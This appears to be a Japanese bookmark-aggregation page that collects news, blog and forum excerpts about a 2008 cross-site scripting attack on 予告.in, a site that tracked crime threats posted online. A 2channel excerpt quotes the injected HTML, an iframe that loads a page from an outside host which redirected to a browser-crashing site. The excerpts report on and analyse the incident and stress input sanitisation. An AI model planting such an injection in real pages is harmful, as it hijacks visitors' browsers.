予告.in、XSS攻撃を受け不正コードを埋め込まれる | スラド セキュリティ
2ちゃんねるなどの掲示板を監視し、「犯行予告」を集積するシステム「予告.in」で、クロスサイトスクリプティング攻撃によって不正コードを埋め込まれていたことが判明した。 予告.inには、犯行予告を通報するフォームが用意されているが、そのフォームの一部(具体的にはURL入力部分)でエスケープ処理を行っておらず、その結果URL部分に悪意のあるコードを埋め込むことが可能になっていたのが原因とのことだ。 これにより、予告.inのトップにアクセスを行うと、2ちゃんねるに「警視庁を爆破する 嘘です」という犯行予告文を投稿してしまう、という現象が発生していたとのことだ。 入力データのサニタイズはセキュリティの基礎ではあるが、確かにURLは見逃しがちな個所ではありそうだ。/.erにはCGIやWebアプリケーションを作成されている方も多いとは思うが、入力されたデータのチェックはすべての項目について、忘れないで
個人だから甘いのかな - ぼくはまちちゃん!
あらあら予告inがXSSやられちゃったらしいですね! 使い古された手法? いまどきエスケープ処理すらしてなくてダサい? 関連の記事に対して、はてなブックマークでも色々言われていたり、 http://b.hatena.ne.jp/t/%E4%BA%88%E5%91%8A.in?threshold=1 ニュースサイトでも、こんな煽り記事を書かれていたりするけれど… 今回の件についてIT企業に勤めるエンジニアに聞いてみると、 「これは初歩中の初歩。XSSコード書いた方も10分も掛かってないよ。それを事前に対策してなかった予告inにはもっとビックリだけど、、、素人なの?」 と語る。 予告inセキュリティ脆弱性を狙ったコード!? 「予告in開発者は素人」 http://news.livedoor.com/article/detail/3759632/ それってどうだろうね。 GoogleやAmazo
予告.inの騒動に思うこと - 遥か彼方の彼方から
雑記予告.inにXSS脆弱性があったらしい見ると大変なことになるらしいよ?なんかクロスサイトスクリプティング云々…なんかもう戻ったとかいう話もあるけど早すぎてフォローしきれん。なんか戻ったってのは踏ませるためっぽい感じだけど。取り敢えず踏んだらVIPに警視庁爆破するって件名で勝手にスレたてさせられるんだって。予告.inが楽しいことになってるみたいだねネット上の犯行予告を集約するサイト、予告.inがクロスサイトスクリプティング攻撃を受けたそうです。予告.inにアクセスするとvipに犯行予告スレを建ててしまうという皮肉な内容のもので、他にもブラウザが落ちるとか色々な話があります。まだ完全に治ったのか把握できてないため僕はアクセスしてません。運営者の矢野さんが正式に発表するまでは近寄らないのが無難かも。XSS(クロスサイトスプリプティング)って何?僕もそう知識があるわけじゃないけど、簡単に言うと
予告.inがクロスサイトスクリプティング攻撃を受けたっぽい
1 : 露華濃(関西地方):2008/08/03(日) 03:14:23.58 ID:7TPSf6W+0 ?S★(717781) ポイント特典 tp://yokoku.in/ <div class=content> <a href=/detail?num=3882>■</a>test <a href=http://a.a/><iframe/src='//a.zz.tc/8/'><font size=1 color=#777777></a></font></a></div> </font> <a href=http://a.a/><iframe/src='//a.zz.tc/8/'> を仕込まれてる a.zz.tc/8/ は tp://www.AMIGO.IN/hahahahahaha/oppai.html に転送されててて、AMIGO.inはブラクラ ソースチェッカーオンライン http:
1
リリース、障害情報などのサービスのお知らせ
最新の人気エントリーの配信
処理を実行中です
j次のブックマーク
k前のブックマーク
lあとで読む
eコメント一覧を開く
oページを開く
